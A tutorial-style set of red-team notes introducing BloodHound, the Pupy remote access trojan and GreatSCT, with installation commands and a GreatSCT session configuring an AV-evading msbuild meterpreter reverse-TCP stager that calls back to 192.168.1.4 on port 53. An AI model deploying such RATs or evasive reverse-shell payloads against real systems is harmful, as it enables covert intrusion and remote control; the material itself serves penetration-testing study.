0x00 Preface

Reference: Micro8 series, lesson 16: https://micro8.gitbook.io/micro8/contents-1/11-20/16-hong-lan-dui-kang-shen-tou-ce-shi-1

Reference: Micro8 series, lesson 17: https://micro8.gitbook.io/micro8/contents-1/11-20/17-hong-lan-dui-kang-shen-tou-ce-shi-2

Reference: Micro8 series, lesson 18: https://micro8.gitbook.io/micro8/contents-1/11-20/18-hong-lan-dui-kang-shen-tou-ce-shi-3

0x01 BloodHound

BloodHound is a free domain analysis tool that uses graph visualisation to expose the hidden and interrelated relationships between objects in an Active Directory environment. Attackers can use BloodHound to quickly identify highly complex attack paths that would otherwise be hard to find; defenders can use it to identify and eliminate those same attack paths. Both blue and red teams can use BloodHound to gain a deeper understanding of the permission relationships in an Active Directory environment.

Tool URL: https://github.com/BloodHoundAD/BloodHound

Its usage is described in detail in the BloodHound subsection of the internal-network penetration domain analysis tools notes.

0x02 Pupy

Pupy is an open-source, cross-platform (Windows, Linux, OSX, Android) multi-function RAT (remote administration tool) and post-exploitation tool written mainly in Python. It supports all-in-memory operation and process injection. Pupy can communicate over a variety of transports, migrate into processes (injection), and load remote Python code from memory.

Project URL: https://github.com/n1nj4sec/pupy

Installation:

git clone https://github.com/n1nj4sec/pupy.git
cd pupy/pupy
pip install rpyc
git submodule update
cd ..
pip install -r pupy/requirements.txt
wget https://github.com/n1nj4sec/pupy/releases/download/latest/payload_templates.txz
tar xvf payload_templates.txz && mv payload_templates/* pupy/payload_templates/ && rm payload_templates.txz && rm -r payload_templates
cd pupy
apt-get install python-xlib
./pupysh.py

If the following error appears:

Collecting pyautogui
Using cached PyAutoGUI-0.9.36.tar.gz
Complete output from command python setup.py egg_info:
Traceback (most recent call last):
File "<string>", line 1, in <module>
File "/tmp/pip-build-a90ODY/pyautogui/setup.py", line 6, in <module> version=__import__('pyautogui').__version__,
File "pyautogui/__init__.py", line 115, in <module>
from . import _pyautogui_x11 as platformModule
File "pyautogui/_pyautogui_x11.py", line 160, in <module>
_display = Display(os.environ['DISPLAY'])
File "/usr/lib/python2.7/UserDict.py", line 40, in __getitem__
raise KeyError(key)
KeyError: 'DISPLAY'

The tool must be installed on a local machine with a GUI: the pyautogui build reads the DISPLAY environment variable at import time, so it fails on a headless server without an X display.

0x03 GreatSCT

GreatSCT is a tool that generates Metasploit payloads intended to bypass common anti-virus detection and application whitelisting mechanisms.

Project URL: https://github.com/GreatSCT/GreatSCT

Installation:

apt-get -y install git
git clone https://github.com/GreatSCT/GreatSCT.git
cd GreatSCT/
cd setup
sudo ./setup.sh -c

After running it:

===========================================================================
Great Scott!
===========================================================================
===========================================================================

Payload information:

Name: Pure MSBuild C# Reverse TCP Stager
Language: msbuild
Rating: Excellent
Description: pure windows/meterpreter/reverse_tcp stager, no
shellcode

Payload: msbuild/meterpreter/rev_tcp selected

Required Options:

Name Value Description
‐‐‐‐ ‐‐‐‐‐ ‐‐‐‐‐‐‐‐‐‐‐
DOMAIN X Optional: Required internal domain
EXPIRE_PAYLOAD X Optional: Payloads expire after "Y" days
HOSTNAME X Optional: Required system hostname
INJECT_METHOD Virtual Virtual or Heap
LHOST IP of the Metasploit handler
LPORT 4444 Port of the Metasploit handler
PROCESSORS X Optional: Minimum number of processors
SLEEP X Optional: Sleep "Y" seconds, check if accelerated
TIMEZONE X Optional: Check to validate not in UTC
USERNAME X Optional: The required user account

Available Commands:

back Go back
exit Completely exit GreatSCT
generate Generate the payload
options Show the shellcode's options
set Set shellcode option

[msbuild/meterpreter/rev_tcp>>] set LHOST 192.168.1.4

[msbuild/meterpreter/rev_tcp>>] set LPORT 53